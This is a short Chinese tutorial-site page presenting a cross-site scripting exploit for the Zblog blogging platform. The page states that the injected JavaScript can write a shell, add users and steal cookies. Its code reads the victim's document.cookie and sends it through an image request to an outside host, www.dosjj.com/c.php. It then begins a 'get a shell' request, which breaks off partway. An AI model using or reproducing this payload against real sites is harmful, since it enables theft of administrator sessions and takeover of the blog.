Zblog最新跨站漏洞及利用代码_漏洞分析教程-查字典教程网
Zblog最新跨站漏洞及利用代码
Zblog最新跨站漏洞及利用代码
发布时间:2016-12-21 来源:查字典编辑
摘要:Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向xmlhttp=poster();cookie=document.co...

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

xmlhttp=poster();

cookie=document.cookie;

login=cookie.indexOf(‘password’)==-1?0:1;

tolocation=’/’;

//get cookie

x=new Image();

x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

//get a shell

data=”txaContent=

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
    •
    最新漏洞分析学习
    热门漏洞分析学习
    网络安全子分类